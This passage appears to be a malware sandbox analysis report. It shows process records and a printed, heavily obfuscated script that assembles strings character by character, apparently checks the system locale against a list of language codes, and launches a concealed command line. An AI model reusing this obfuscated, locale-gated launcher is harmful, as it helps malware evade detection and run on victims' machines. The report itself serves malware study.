Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 22:34:54 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 22:34:54 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff77afe0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 22:34:54 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function mcjbt() { |
|
1 | ihrzytll = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var dlionh = this[wdaftsyoa + xjdeyvlu + uwrdz + ntkuf + yhrhdry + oswruh + aaije + jdlbmvwe] ( this[waidtcyp + uycnnqjjz + krydrupec + uwrdz + grqiledq + wdaftsyoa + jdlbmvwe][ytsfsjuo + uwrdz + yhrhdry + xjdeyvlu + jdlbmvwe + yhrhdry + qygbhluo + npnpcivn + wffwgq + yhrhdry + krydrupec + jdlbmvwe] ( waidtcyp + uycnnqjjz + krydrupec + uwrdz + grqiledq + wdaftsyoa + jdlbmvwe + gamav + uycnnqjjz + txviqcv + yhrhdry + nhudcxq + nhudcxq ) [ryhwvcmt + yhrhdry + wrkikxhf + ryhwvcmt + yhrhdry + xjdeyvlu + gkvwof] ( xpayhao + kiavka + dfmhjorbi + gnsotpp + hmxuqjlma + ytsfsjuo + txrycxjym + ryhwvcmt + ryhwvcmt + dfmhjorbi + ojgxbphx + avjsvu + hmxuqjlma + txrycxjym + uycnnqjjz + dfmhjorbi + ryhwvcmt + kfaosxoxv + ytsfsjuo + dbfpas + aaije + jdlbmvwe + uwrdz + dbfpas + nhudcxq + fdkfbnw + qropr + xjdeyvlu + aaije + yhrhdry + nhudcxq + kfaosxoxv + oswruh + aaije + jdlbmvwe + yhrhdry + uwrdz + aaije + xjdeyvlu + jdlbmvwe + grqiledq + dbfpas + aaije + xjdeyvlu + nhudcxq + kfaosxoxv + pvcsgyafk + dbfpas + krydrupec + xjdeyvlu + nhudcxq + yhrhdry ), 16 ); |
|
3 | for ( byhwoxg = 0 ; byhwoxg < ihrzytll[nhudcxq + yhrhdry + aaije + wrkikxhf + jdlbmvwe + txviqcv] ; ++ byhwoxg ) | |
4 | { | |
5 | if ( dlionh == ihrzytll[byhwoxg] ) | |
6 | { | |
7 | dlionh = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( dlionh !== true ) | |
12 | this[waidtcyp + uycnnqjjz + krydrupec + uwrdz + grqiledq + wdaftsyoa + jdlbmvwe][pftcskn + sgonzblcf + grqiledq + jdlbmvwe] ( ); | |
13 | this[waidtcyp + uycnnqjjz + krydrupec + uwrdz + grqiledq + wdaftsyoa + jdlbmvwe][ytsfsjuo + uwrdz + yhrhdry + xjdeyvlu + jdlbmvwe + yhrhdry + qygbhluo + npnpcivn + wffwgq + yhrhdry + krydrupec + jdlbmvwe] ( waidtcyp + uycnnqjjz + krydrupec + uwrdz + grqiledq + wdaftsyoa + jdlbmvwe + gamav + uycnnqjjz + txviqcv + yhrhdry + nhudcxq + nhudcxq ) [uwrdz + sgonzblcf + aaije] ( krydrupec + xwmvhz + gkvwof + fdkfbnw + hfdnpge + krydrupec + fdkfbnw + wdaftsyoa + dbfpas + ytyxwhq + yhrhdry + uwrdz + ntkuf + txviqcv + yhrhdry + nhudcxq + nhudcxq + gamav + yhrhdry + ybjvlw + yhrhdry + fdkfbnw + rleizsk + ytsfsjuo + dbfpas + xwmvhz + xwmvhz + xjdeyvlu + aaije + gkvwof + fdkfbnw + vbanglzqe + oswruh + aaije + icofzh + dbfpas + pwozoo + yhrhdry + rleizsk + waidtcyp + yhrhdry + npnpcivn + ryhwvcmt + yhrhdry + nnzpmgzs + sgonzblcf + yhrhdry + ntkuf + jdlbmvwe + fdkfbnw + rleizsk + qygbhluo + sgonzblcf + jdlbmvwe + imgjsb + grqiledq + nhudcxq + yhrhdry + fdkfbnw + rdmcen + jdlbmvwe + yhrhdry + xwmvhz + wdaftsyoa + rdmcen + kfaosxoxv + grqiledq + aaije + icofzh + dbfpas + grqiledq + krydrupec + yhrhdry + gamav + wdaftsyoa + gkvwof + ywpxby + fdkfbnw + txviqcv + jdlbmvwe + jdlbmvwe + wdaftsyoa + vtrmpk + hfdnpge + hfdnpge + pqxckh + chgfb + bfwajjto + gamav + pqxckh + wnsglfwqt + bfwajjto + gamav + pqxckh + gamav + dclqdgbta + pdmrlhi + vwuslzr + hfdnpge + grqiledq + aaije + icofzh + dbfpas + grqiledq + krydrupec + yhrhdry + gamav + wdaftsyoa + txviqcv + wdaftsyoa + vbanglzqe + fgrpf + fgrpf + ntkuf + jdlbmvwe + xjdeyvlu + uwrdz + jdlbmvwe + fdkfbnw + rdmcen + jdlbmvwe + yhrhdry + xwmvhz + wdaftsyoa + rdmcen + kfaosxoxv + grqiledq + aaije + icofzh + dbfpas + grqiledq + krydrupec + yhrhdry + gamav + wdaftsyoa + gkvwof + ywpxby + fgrpf + fgrpf + krydrupec + xwmvhz + gkvwof + fdkfbnw + hfdnpge + krydrupec + fdkfbnw + aaije + yhrhdry + jdlbmvwe + fdkfbnw + sgonzblcf + ntkuf + yhrhdry + fdkfbnw + kfaosxoxv + kfaosxoxv + pqxckh + chgfb + bfwajjto + gamav + pqxckh + wnsglfwqt + bfwajjto + gamav + pqxckh + gamav + dclqdgbta + pdmrlhi + vwuslzr + zblrrno + glbrecbex + glbrecbex + glbrecbex + glbrecbex + kfaosxoxv + gkvwof + xjdeyvlu + icofzh + ytyxwhq + ytyxwhq + ytyxwhq + uwrdz + dbfpas + dbfpas + jdlbmvwe + kfaosxoxv + fgrpf + fgrpf + krydrupec + xwmvhz + gkvwof + fdkfbnw + hfdnpge + krydrupec + fdkfbnw + uwrdz + yhrhdry + wrkikxhf + ntkuf + icofzh + uwrdz + bfwajjto + dclqdgbta + fdkfbnw + hfdnpge + ntkuf + fdkfbnw + kfaosxoxv + kfaosxoxv + pqxckh + chgfb + bfwajjto + gamav + pqxckh + wnsglfwqt + bfwajjto + gamav + pqxckh + gamav + dclqdgbta + pdmrlhi + vwuslzr + zblrrno + glbrecbex + glbrecbex + glbrecbex + glbrecbex + kfaosxoxv + gkvwof + xjdeyvlu + icofzh + ytyxwhq + ytyxwhq + ytyxwhq + uwrdz + dbfpas + dbfpas + jdlbmvwe + kfaosxoxv + bfwajjto + chgfb + qxuskp + glbrecbex + pqxckh + bfwajjto + glbrecbex + wnsglfwqt + delktbo + dclqdgbta + bfwajjto + glbrecbex + dclqdgbta + qxuskp + gamav + gkvwof + nhudcxq + nhudcxq, 0, false ); |
|
14 | } | |
15 | qxuskp = "Q"; | |
16 | qxuskp = "k"; | |
17 | qxuskp = "Q"; | |
18 | qxuskp = "e"; | |
19 | qxuskp = "y"; | |
20 | qxuskp = "a"; | |
21 | qxuskp = "E"; | |
22 | qxuskp = "r"; | |
23 | qxuskp = "p"; | |
24 | qxuskp = "k"; | |
25 | qxuskp = "W"; | |
26 | qxuskp = "J"; | |
27 | qxuskp = "D"; | |
28 | qxuskp = "y"; | |
29 | qxuskp = "7"; | |
30 | dclqdgbta = "E"; | |
31 | dclqdgbta = "h"; | |
32 | dclqdgbta = "p"; | |
33 | dclqdgbta = "L"; | |
34 | dclqdgbta = "P"; | |
35 | dclqdgbta = "N"; | |
36 | dclqdgbta = "q"; | |
37 | dclqdgbta = "Y"; | |
38 | dclqdgbta = "W"; | |
39 | dclqdgbta = "O"; | |
40 | dclqdgbta = "Q"; | |
41 | dclqdgbta = "p"; | |
42 | dclqdgbta = "O"; | |
43 | dclqdgbta = "Y"; | |
44 | dclqdgbta = "V"; | |
45 | dclqdgbta = "J"; | |
46 | dclqdgbta = "q"; | |
47 | dclqdgbta = "I"; | |
48 | dclqdgbta = "E"; | |
49 | dclqdgbta = "z"; | |
50 | dclqdgbta = "P"; | |
51 | dclqdgbta = "t"; | |
52 | dclqdgbta = "l"; | |
53 | dclqdgbta = "n"; | |
54 | dclqdgbta = "h"; | |
55 | dclqdgbta = "K"; | |
56 | dclqdgbta = "o"; | |
57 | dclqdgbta = "c"; | |
58 | dclqdgbta = "m"; | |
59 | dclqdgbta = "T"; | |
60 | dclqdgbta = "C"; | |
61 | dclqdgbta = "h"; | |
62 | dclqdgbta = "2"; | |
63 | pwozoo = "j"; | |
64 | pwozoo = "h"; | |
65 | pwozoo = "Q"; | |
66 | pwozoo = "u"; | |
67 | pwozoo = "T"; | |
68 | pwozoo = "T"; | |
69 | pwozoo = "J"; | |
70 | pwozoo = "C"; | |
71 | pwozoo = "k"; | |
72 | pwozoo = "B"; | |
73 | pwozoo = "N"; | |
74 | pwozoo = "I"; | |
75 | pwozoo = "i"; | |
76 | pwozoo = "f"; | |
77 | pwozoo = "P"; | |
78 | pwozoo = "p"; | |
79 | pwozoo = "o"; | |
80 | pwozoo = "K"; | |
81 | pwozoo = "V"; | |
82 | pwozoo = "r"; | |
83 | pwozoo = "d"; | |
84 | pwozoo = "A"; | |
85 | pwozoo = "m"; | |
86 | pwozoo = "k"; | |
87 | wdaftsyoa = "k"; | |
88 | wdaftsyoa = "B"; | |
89 | wdaftsyoa = "h"; | |
90 | wdaftsyoa = "y"; | |
91 | wdaftsyoa = "V"; | |
92 | wdaftsyoa = "C"; | |
93 | wdaftsyoa = "s"; | |
94 | wdaftsyoa = "V"; | |
95 | wdaftsyoa = "D"; | |
96 | wdaftsyoa = "M"; | |
97 | wdaftsyoa = "i"; | |
98 | wdaftsyoa = "q"; | |
99 | wdaftsyoa = "x"; | |
100 | wdaftsyoa = "a"; | |
101 | wdaftsyoa = "c"; | |
102 | wdaftsyoa = "E"; | |
103 | wdaftsyoa = "k"; | |
104 | wdaftsyoa = "F"; | |
105 | wdaftsyoa = "s"; | |
106 | wdaftsyoa = "z"; | |
107 | wdaftsyoa = "P"; | |
108 | wdaftsyoa = "u"; | |
109 | wdaftsyoa = "M"; | |
110 | wdaftsyoa = "f"; | |
111 | wdaftsyoa = "A"; | |
112 | wdaftsyoa = "G"; | |
113 | wdaftsyoa = "G"; | |
114 | wdaftsyoa = "f"; | |
115 | wdaftsyoa = "F"; | |
116 | wdaftsyoa = "p"; | |
117 | ojgxbphx = "g"; | |
118 | ojgxbphx = "X"; | |
119 | ojgxbphx = "Y"; | |
120 | ojgxbphx = "a"; | |
121 | ojgxbphx = "n"; | |
122 | ojgxbphx = "b"; | |
123 | ojgxbphx = "N"; | |
124 | imgjsb = "f"; | |
125 | imgjsb = "U"; | |
126 | imgjsb = "M"; | |
127 | imgjsb = "g"; | |
128 | imgjsb = "F"; | |
129 | imgjsb = "i"; | |
130 | imgjsb = "P"; | |
131 | imgjsb = "e"; | |
132 | imgjsb = "O"; | |
133 | imgjsb = "H"; | |
134 | imgjsb = "w"; | |
135 | imgjsb = "h"; | |
136 | imgjsb = "M"; | |
137 | imgjsb = "j"; | |
138 | imgjsb = "i"; | |
139 | imgjsb = "J"; | |
140 | imgjsb = "v"; | |
141 | imgjsb = "z"; | |
142 | imgjsb = "L"; | |
143 | imgjsb = "x"; | |
144 | imgjsb = "f"; | |
145 | imgjsb = "y"; | |
146 | imgjsb = "e"; | |
147 | imgjsb = "r"; | |
148 | imgjsb = "Z"; | |
149 | imgjsb = "b"; | |
150 | imgjsb = "k"; | |
151 | imgjsb = "B"; | |
152 | imgjsb = "Q"; | |
153 | imgjsb = "t"; | |
154 | imgjsb = "F"; | |
155 | qygbhluo = "C"; | |
156 | qygbhluo = "G"; | |
157 | qygbhluo = "b"; | |
158 | qygbhluo = "i"; | |
159 | qygbhluo = "Y"; | |
160 | qygbhluo = "Q"; | |
161 | qygbhluo = "C"; | |
162 | qygbhluo = "x"; | |
163 | qygbhluo = "Q"; | |
164 | qygbhluo = "W"; | |
165 | qygbhluo = "R"; | |
166 | qygbhluo = "h"; | |
167 | qygbhluo = "a"; | |
168 | qygbhluo = "Y"; | |
169 | qygbhluo = "A"; | |
170 | qygbhluo = "q"; | |
171 | qygbhluo = "h"; | |
172 | qygbhluo = "b"; | |
173 | qygbhluo = "S"; | |
174 | qygbhluo = "b"; | |
175 | qygbhluo = "m"; | |
176 | qygbhluo = "O"; | |
177 | qygbhluo = "e"; | |
178 | qygbhluo = "O"; | |
179 | qygbhluo = "Z"; | |
180 | qygbhluo = "W"; | |
181 | qygbhluo = "d"; | |
182 | qygbhluo = "O"; | |
183 | qygbhluo = "l"; | |
184 | qygbhluo = "w"; | |
185 | qygbhluo = "P"; | |
186 | qygbhluo = "c"; | |
187 | qygbhluo = "Q"; | |
188 | qygbhluo = "t"; | |
189 | qygbhluo = "e"; | |
190 | qygbhluo = "K"; | |
191 | qygbhluo = "Z"; | |
192 | qygbhluo = "r"; | |
193 | qygbhluo = "P"; | |
194 | qygbhluo = "z"; | |
195 | qygbhluo = "h"; | |
196 | qygbhluo = "p"; | |
197 | qygbhluo = "Z"; | |
198 | qygbhluo = "Q"; | |
199 | qygbhluo = "O"; | |
200 | rleizsk = "V"; | |
201 | rleizsk = "D"; | |
202 | rleizsk = "L"; | |
203 | rleizsk = "A"; | |
204 | rleizsk = "D"; | |
205 | rleizsk = "B"; | |
206 | rleizsk = "K"; | |
207 | rleizsk = "G"; | |
208 | rleizsk = "z"; | |
209 | rleizsk = "i"; | |
210 | rleizsk = "G"; | |
211 | rleizsk = "c"; | |
212 | rleizsk = "C"; | |
213 | rleizsk = "s"; | |
214 | rleizsk = "M"; | |
215 | rleizsk = "w"; | |
216 | rleizsk = "-"; | |
217 | pdmrlhi = "r"; | |
218 | pdmrlhi = "K"; | |
219 | pdmrlhi = "e"; | |
220 | pdmrlhi = "Z"; | |
221 | pdmrlhi = "Q"; | |
222 | pdmrlhi = "S"; | |
223 | pdmrlhi = "p"; | |
224 | pdmrlhi = "l"; | |
225 | pdmrlhi = "I"; | |
226 | pdmrlhi = "k"; | |
227 | pdmrlhi = "H"; | |
228 | pdmrlhi = "i"; | |
229 | pdmrlhi = "s"; | |
230 | pdmrlhi = "y"; | |
231 | pdmrlhi = "G"; | |
232 | pdmrlhi = "H"; | |
233 | pdmrlhi = "k"; | |
234 | pdmrlhi = "n"; | |
235 | pdmrlhi = "Q"; | |
236 | pdmrlhi = "H"; | |
237 | pdmrlhi = "C"; | |
238 | pdmrlhi = "c"; | |
239 | pdmrlhi = "B"; | |
240 | pdmrlhi = "q"; | |
241 | pdmrlhi = "I"; | |
242 | pdmrlhi = "Q"; | |
243 | pdmrlhi = "A"; | |
244 | pdmrlhi = "q"; | |
245 | pdmrlhi = "X"; | |
246 | pdmrlhi = "X"; | |
247 | pdmrlhi = "G"; | |
248 | pdmrlhi = "i"; | |
249 | pdmrlhi = "C"; | |
250 | pdmrlhi = "Y"; | |
251 | pdmrlhi = "z"; | |
252 | pdmrlhi = "h"; | |
253 | pdmrlhi = "u"; | |
254 | pdmrlhi = "o"; | |
255 | pdmrlhi = "g"; | |
256 | pdmrlhi = "t"; | |
257 | pdmrlhi = "I"; | |
258 | pdmrlhi = "w"; | |
259 | pdmrlhi = "g"; | |
260 | pdmrlhi = "E"; | |
261 | pdmrlhi = "0"; | |
262 | vwuslzr = "t"; | |
263 | vwuslzr = "U"; | |
264 | vwuslzr = "B"; | |
265 | vwuslzr = "V"; | |
266 | vwuslzr = "r"; | |
267 | vwuslzr = "O"; | |
268 | vwuslzr = "r"; | |
269 | vwuslzr = "y"; | |
270 | vwuslzr = "q"; | |
271 | vwuslzr = "e"; | |
272 | vwuslzr = "P"; | |
273 | vwuslzr = "5"; | |
274 | wffwgq = "v"; | |
275 | wffwgq = "W"; | |
276 | wffwgq = "S"; | |
277 | wffwgq = "A"; | |
278 | wffwgq = "H"; | |
279 | wffwgq = "r"; | |
280 | wffwgq = "c"; | |
281 | wffwgq = "K"; | |
282 | wffwgq = "i"; | |
283 | wffwgq = "T"; | |
284 | wffwgq = "c"; | |
285 | wffwgq = "t"; | |
286 | wffwgq = "h"; | |
287 | wffwgq = "X"; | |
288 | wffwgq = "x"; | |
289 | wffwgq = "l"; | |
290 | wffwgq = "Z"; | |
291 | wffwgq = "Z"; | |
292 | wffwgq = "g"; | |
293 | wffwgq = "W"; | |
294 | wffwgq = "o"; | |
295 | wffwgq = "m"; | |
296 | wffwgq = "H"; | |
297 | wffwgq = "q"; | |
298 | wffwgq = "F"; | |
299 | wffwgq = "c"; | |
300 | wffwgq = "N"; | |
301 | wffwgq = "D"; | |
302 | wffwgq = "c"; | |
303 | wffwgq = "q"; | |
304 | wffwgq = "w"; | |
305 | wffwgq = "W"; | |
306 | wffwgq = "a"; | |
307 | wffwgq = "d"; | |
308 | wffwgq = "V"; | |
309 | wffwgq = "r"; | |
310 | wffwgq = "Y"; | |
311 | wffwgq = "d"; | |
312 | wffwgq = "r"; | |
313 | wffwgq = "j"; | |
314 | wffwgq = "G"; | |
315 | wffwgq = "T"; | |
316 | wffwgq = "j"; | |
317 | glbrecbex = "Z"; | |
318 | glbrecbex = "v"; | |
319 | glbrecbex = "U"; | |
320 | glbrecbex = "g"; | |
321 | glbrecbex = "I"; | |
322 | glbrecbex = "t"; | |
323 | glbrecbex = "B"; | |
324 | glbrecbex = "p"; | |
325 | glbrecbex = "o"; | |
326 | glbrecbex = "s"; | |
327 | glbrecbex = "a"; | |
328 | glbrecbex = "a"; | |
329 | glbrecbex = "A"; | |
330 | glbrecbex = "e"; | |
331 | glbrecbex = "Y"; | |
332 | glbrecbex = "y"; | |
333 | glbrecbex = "H"; | |
334 | glbrecbex = "f"; | |
335 | glbrecbex = "I"; | |
336 | glbrecbex = "W"; | |
337 | glbrecbex = "y"; | |
338 | glbrecbex = "P"; | |
339 | glbrecbex = "X"; | |
340 | glbrecbex = "q"; | |
341 | glbrecbex = "R"; | |
342 | glbrecbex = "t"; | |
343 | glbrecbex = "F"; | |
344 | glbrecbex = "b"; | |
345 | glbrecbex = "p"; | |
346 | glbrecbex = "A"; | |
347 | glbrecbex = "D"; | |
348 | glbrecbex = "d"; | |
349 | glbrecbex = "A"; | |
350 | glbrecbex = "Y"; | |
351 | glbrecbex = "G"; | |
352 | glbrecbex = "z"; | |
353 | glbrecbex = "b"; | |
354 | glbrecbex = "B"; | |
355 | glbrecbex = "d"; | |
356 | glbrecbex = "m"; | |
357 | glbrecbex = "8"; | |
358 | aaije = "p"; | |
359 | aaije = "d"; | |
360 | aaije = "P"; | |
361 | aaije = "F"; | |
362 | aaije = "f"; | |
363 | aaije = "Z"; | |
364 | aaije = "n"; | |
365 | txrycxjym = "W"; | |
366 | txrycxjym = "y"; | |
367 | txrycxjym = "M"; | |
368 | txrycxjym = "i"; | |
369 | txrycxjym = "r"; | |
370 | txrycxjym = "x"; | |
371 | txrycxjym = "I"; | |
372 | txrycxjym = "O"; | |
373 | txrycxjym = "F"; | |
374 | txrycxjym = "z"; | |
375 | txrycxjym = "A"; | |
376 | txrycxjym = "m"; | |
377 | txrycxjym = "m"; | |
378 | txrycxjym = "G"; | |
379 | txrycxjym = "k"; | |
380 | txrycxjym = "C"; | |
381 | txrycxjym = "b"; | |
382 | txrycxjym = "Y"; | |
383 | txrycxjym = "m"; | |
384 | txrycxjym = "U"; | |
385 | dbfpas = "o"; | |
386 | dbfpas = "x"; | |
387 | dbfpas = "Q"; | |
388 | dbfpas = "A"; | |
389 | dbfpas = "R"; | |
390 | dbfpas = "H"; | |
391 | dbfpas = "v"; | |
392 | dbfpas = "M"; | |
393 | dbfpas = "p"; | |
394 | dbfpas = "b"; | |
395 | dbfpas = "O"; | |
396 | dbfpas = "e"; | |
397 | dbfpas = "Z"; | |
398 | dbfpas = "s"; | |
399 | dbfpas = "g"; | |
400 | dbfpas = "U"; | |
401 | dbfpas = "S"; | |
402 | dbfpas = "o"; | |
403 | npnpcivn = "e"; | |
404 | npnpcivn = "b"; | |
405 | npnpcivn = "A"; | |
406 | npnpcivn = "v"; | |
407 | npnpcivn = "h"; | |
408 | npnpcivn = "H"; | |
409 | npnpcivn = "i"; | |
410 | npnpcivn = "D"; | |
411 | npnpcivn = "d"; | |
412 | npnpcivn = "R"; | |
413 | npnpcivn = "r"; | |
414 | npnpcivn = "t"; | |
415 | npnpcivn = "V"; | |
416 | npnpcivn = "E"; | |
417 | npnpcivn = "w"; | |
418 | npnpcivn = "f"; | |
419 | npnpcivn = "j"; | |
420 | npnpcivn = "O"; | |
421 | npnpcivn = "M"; | |
422 | npnpcivn = "U"; | |
423 | npnpcivn = "m"; | |
424 | npnpcivn = "U"; | |
425 | npnpcivn = "K"; | |
426 | npnpcivn = "S"; | |
427 | npnpcivn = "A"; | |
428 | npnpcivn = "W"; | |
429 | npnpcivn = "i"; | |
430 | npnpcivn = "B"; | |
431 | npnpcivn = "z"; | |
432 | npnpcivn = "o"; | |
433 | npnpcivn = "B"; | |
434 | npnpcivn = "u"; | |
435 | npnpcivn = "w"; | |
436 | npnpcivn = "b"; | |
437 | chgfb = "b"; | |
438 | chgfb = "x"; | |
439 | chgfb = "V"; | |
440 | chgfb = "O"; | |
441 | chgfb = "k"; | |
442 | chgfb = "G"; | |
443 | chgfb = "D"; | |
444 | chgfb = "Z"; | |
445 | chgfb = "b"; | |
446 | chgfb = "T"; | |
447 | chgfb = "H"; | |
448 | chgfb = "t"; | |
449 | chgfb = "E"; | |
450 | chgfb = "D"; | |
451 | chgfb = "J"; | |
452 | chgfb = "w"; | |
453 | chgfb = "H"; | |
454 | chgfb = "Y"; | |
455 | chgfb = "z"; | |
456 | chgfb = "X"; | |
457 | chgfb = "n"; | |
458 | chgfb = "A"; | |
459 | chgfb = "Y"; | |
460 | chgfb = "J"; | |
461 | chgfb = "h"; | |
462 | chgfb = "r"; | |
463 | chgfb = "Q"; | |
464 | chgfb = "J"; | |
465 | chgfb = "9"; | |
466 | krydrupec = "K"; | |
467 | krydrupec = "q"; | |
468 | krydrupec = "K"; | |
469 | krydrupec = "i"; | |
470 | krydrupec = "G"; | |
471 | krydrupec = "N"; | |
472 | krydrupec = "c"; | |
473 | krydrupec = "U"; | |
474 | krydrupec = "O"; | |
475 | krydrupec = "W"; | |
476 | krydrupec = "y"; | |
477 | krydrupec = "D"; | |
478 | krydrupec = "d"; | |
479 | krydrupec = "d"; | |
480 | krydrupec = "a"; | |
481 | krydrupec = "f"; | |
482 | krydrupec = "D"; | |
483 | krydrupec = "N"; | |
484 | krydrupec = "M"; | |
485 | krydrupec = "F"; | |
486 | krydrupec = "Y"; | |
487 | krydrupec = "T"; | |
488 | krydrupec = "h"; | |
489 | krydrupec = "O"; | |
490 | krydrupec = "D"; | |
491 | krydrupec = "B"; | |
492 | krydrupec = "A"; | |
493 | krydrupec = "J"; | |
494 | krydrupec = "R"; | |
495 | krydrupec = "v"; | |
496 | krydrupec = "G"; | |
497 | krydrupec = "e"; | |
498 | krydrupec = "p"; | |
499 | krydrupec = "L"; | |
500 | krydrupec = "t"; | |
501 | krydrupec = "c"; | |
502 | fgrpf = "l"; | |
503 | fgrpf = "i"; | |
504 | fgrpf = "g"; | |
505 | fgrpf = "o"; | |
506 | fgrpf = "m"; | |
507 | fgrpf = "T"; | |
508 | fgrpf = "J"; | |
509 | fgrpf = "s"; | |
510 | fgrpf = "B"; | |
511 | fgrpf = "h"; | |
512 | fgrpf = "n"; | |
513 | fgrpf = "Y"; | |
514 | fgrpf = "y"; | |
515 | fgrpf = "P"; | |
516 | fgrpf = "X"; | |
517 | fgrpf = "r"; | |
518 | fgrpf = "H"; | |
519 | fgrpf = "X"; | |
520 | fgrpf = "p"; | |
521 | fgrpf = "&"; | |
522 | uwrdz = "C"; | |
523 | uwrdz = "b"; | |
524 | uwrdz = "J"; | |
525 | uwrdz = "b"; | |
526 | uwrdz = "k"; | |
527 | uwrdz = "r"; | |
528 | grqiledq = "Y"; | |
529 | grqiledq = "U"; | |
530 | grqiledq = "k"; | |
531 | grqiledq = "L"; | |
532 | grqiledq = "u"; | |
533 | grqiledq = "n"; | |
534 | grqiledq = "Q"; | |
535 | grqiledq = "Z"; | |
536 | grqiledq = "W"; | |
537 | grqiledq = "Z"; | |
538 | grqiledq = "A"; | |
539 | grqiledq = "L"; | |
540 | grqiledq = "t"; | |
541 | grqiledq = "B"; | |
542 | grqiledq = "b"; | |
543 | grqiledq = "d"; | |
544 | grqiledq = "W"; | |
545 | grqiledq = "f"; | |
546 | grqiledq = "L"; | |
547 | grqiledq = "D"; | |
548 | grqiledq = "h"; | |
549 | grqiledq = "e"; | |
550 | grqiledq = "P"; | |
551 | grqiledq = "e"; | |
552 | grqiledq = "Y"; | |
553 | grqiledq = "K"; | |
554 | grqiledq = "g"; | |
555 | grqiledq = "x"; | |
556 | grqiledq = "d"; | |
557 | grqiledq = "i"; | |
558 | gamav = "o"; | |
559 | gamav = "r"; | |
560 | gamav = "h"; | |
561 | gamav = "l"; | |
562 | gamav = "z"; | |
563 | gamav = "n"; | |
564 | gamav = "T"; | |
565 | gamav = "A"; | |
566 | gamav = "m"; | |
567 | gamav = "H"; | |
568 | gamav = "V"; | |
569 | gamav = "Z"; | |
570 | gamav = "l"; | |
571 | gamav = "A"; | |
572 | gamav = "D"; | |
573 | gamav = "C"; | |
574 | gamav = "s"; | |
575 | gamav = "v"; | |
576 | gamav = "V"; | |
577 | gamav = "U"; | |
578 | gamav = "g"; | |
579 | gamav = "B"; | |
580 | gamav = "Y"; | |
581 | gamav = "P"; | |
582 | gamav = "."; | |
583 | uycnnqjjz = "x"; | |
584 | uycnnqjjz = "A"; | |
585 | uycnnqjjz = "H"; | |
586 | uycnnqjjz = "j"; | |
587 | uycnnqjjz = "G"; | |
588 | uycnnqjjz = "J"; | |
589 | uycnnqjjz = "V"; | |
590 | uycnnqjjz = "m"; | |
591 | uycnnqjjz = "g"; | |
592 | uycnnqjjz = "n"; | |
593 | uycnnqjjz = "f"; | |
594 | uycnnqjjz = "l"; | |
595 | uycnnqjjz = "B"; | |
596 | uycnnqjjz = "T"; | |
597 | uycnnqjjz = "z"; | |
598 | uycnnqjjz = "X"; | |
599 | uycnnqjjz = "Z"; | |
600 | uycnnqjjz = "z"; | |
601 | uycnnqjjz = "Y"; | |
602 | uycnnqjjz = "j"; | |
603 | uycnnqjjz = "S"; | |
604 | dfmhjorbi = "o"; | |
605 | dfmhjorbi = "M"; | |
606 | dfmhjorbi = "k"; | |
607 | dfmhjorbi = "u"; | |
608 | dfmhjorbi = "B"; | |
609 | dfmhjorbi = "K"; | |
610 | dfmhjorbi = "N"; | |
611 | dfmhjorbi = "a"; | |
612 | dfmhjorbi = "o"; | |
613 | dfmhjorbi = "L"; | |
614 | dfmhjorbi = "Z"; | |
615 | dfmhjorbi = "u"; | |
616 | dfmhjorbi = "x"; | |
617 | dfmhjorbi = "l"; | |
618 | dfmhjorbi = "A"; | |
619 | dfmhjorbi = "q"; | |
620 | dfmhjorbi = "K"; | |
621 | dfmhjorbi = "b"; | |
622 | dfmhjorbi = "j"; | |
623 | dfmhjorbi = "S"; | |
624 | dfmhjorbi = "L"; | |
625 | dfmhjorbi = "h"; | |
626 | dfmhjorbi = "t"; | |
627 | dfmhjorbi = "S"; | |
628 | dfmhjorbi = "G"; | |
629 | dfmhjorbi = "m"; | |
630 | dfmhjorbi = "y"; | |
631 | dfmhjorbi = "y"; | |
632 | dfmhjorbi = "A"; | |
633 | dfmhjorbi = "U"; | |
634 | dfmhjorbi = "p"; | |
635 | dfmhjorbi = "o"; | |
636 | dfmhjorbi = "I"; | |
637 | dfmhjorbi = "q"; | |
638 | dfmhjorbi = "V"; | |
639 | dfmhjorbi = "B"; | |
640 | dfmhjorbi = "d"; | |
641 | dfmhjorbi = "d"; | |
642 | dfmhjorbi = "S"; | |
643 | dfmhjorbi = "E"; | |
644 | xwmvhz = "G"; | |
645 | xwmvhz = "N"; | |
646 | xwmvhz = "n"; | |
647 | xwmvhz = "p"; | |
648 | xwmvhz = "z"; | |
649 | xwmvhz = "s"; | |
650 | xwmvhz = "d"; | |
651 | xwmvhz = "E"; | |
652 | xwmvhz = "A"; | |
653 | xwmvhz = "D"; | |
654 | xwmvhz = "d"; | |
655 | xwmvhz = "v"; | |
656 | xwmvhz = "O"; | |
657 | xwmvhz = "U"; | |
658 | xwmvhz = "Q"; | |
659 | xwmvhz = "h"; | |
660 | xwmvhz = "X"; | |
661 | xwmvhz = "r"; | |
662 | xwmvhz = "r"; | |
663 | xwmvhz = "j"; | |
664 | xwmvhz = "U"; | |
665 | xwmvhz = "m"; | |
666 | xjdeyvlu = "J"; | |
667 | xjdeyvlu = "A"; | |
668 | xjdeyvlu = "g"; | |
669 | xjdeyvlu = "a"; | |
670 | xjdeyvlu = "x"; | |
671 | xjdeyvlu = "e"; | |
